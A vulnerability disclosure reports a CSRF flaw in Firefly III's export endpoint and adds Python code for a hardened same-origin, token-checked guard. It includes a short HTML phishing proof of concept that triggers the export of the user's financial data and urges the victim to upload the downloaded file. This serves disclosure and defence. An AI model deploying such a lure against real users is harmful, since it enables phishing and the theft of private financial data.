Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii

Valid
Reported on Jun 2nd 2021

✍️ Description

The /export/export endpoint does not have CSRF protection. Because the export is triggered by a plain GET request authenticated only by the session cookie, a page on any other origin can force the download of the victim's account data and, combined with social engineering, trick the user into handing the exported file to the attacker.

🕵️‍♂️ Proof of Concept

  • Log in to the user account.
  • Create the following file and open it in the same browser.
<!-- PoC.html -->
<html>
<body>
    To verify that you are a human, upload the file that has been downloaded from our website now.
    <a href="https://demo.firefly-iii.org/export/export">Download Test File</a>
</body>
</html>
  • Clicking the link downloads the user's data from the application without the user's consent. An attacker can then social-engineer the user into uploading this file to an attacker-controlled server.

💥 Impact

Potential leakage of private financial information through phishing, by exploiting the missing CSRF token on the export endpoint.
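The root cause is that framework CSRF middleware (Laravel's included, which Firefly III uses) only checks tokens on non-safe methods, so a GET route that performs a sensitive export is never covered. The following added example, not code from the Firefly III project, models that default beside a hardened guard that forces sensitive routes to be a same-origin POST with a session-bound token; the route list, host and token values are constructed for the demonstration.

```python
"""Added example (not Firefly III code): request-level CSRF guard for a
sensitive export route. Laravel's stock VerifyCsrfToken middleware skips
GET/HEAD/OPTIONS, which is exactly why a GET /export/export is unchecked."""
from dataclasses import dataclass, field
import hmac

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Constructed list of routes that perform a sensitive action regardless of method.
SENSITIVE_PATHS = {"/export/export"}


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    session_token: str = ""  # token stored server-side in the user's session


def _token_valid(req: Request) -> bool:
    # Constant-time comparison of the submitted token with the session token.
    return hmac.compare_digest(req.form.get("_token", ""), req.session_token)


def laravel_style_check(req: Request) -> bool:
    """Models the default behaviour: safe methods bypass the token check."""
    if req.method in SAFE_METHODS:
        return True
    return _token_valid(req)


def hardened_check(req: Request) -> bool:
    """Sensitive routes must be POST, carry a valid token and be same-origin.

    Sec-Fetch-Site is set by the browser and cannot be forged by a cross-site
    page; a navigation from PoC.html arrives as 'cross-site'.
    """
    if req.path not in SENSITIVE_PATHS:
        return laravel_style_check(req)
    if req.method != "POST":
        return False
    if not _token_valid(req):
        return False
    # Treat a missing header as cross-site (old browsers) to fail closed.
    return req.headers.get("Sec-Fetch-Site", "cross-site") == "same-origin"
```

The GET from the report's PoC passes the default check but is rejected by the hardened one, while a same-origin POST carrying the session token still succeeds.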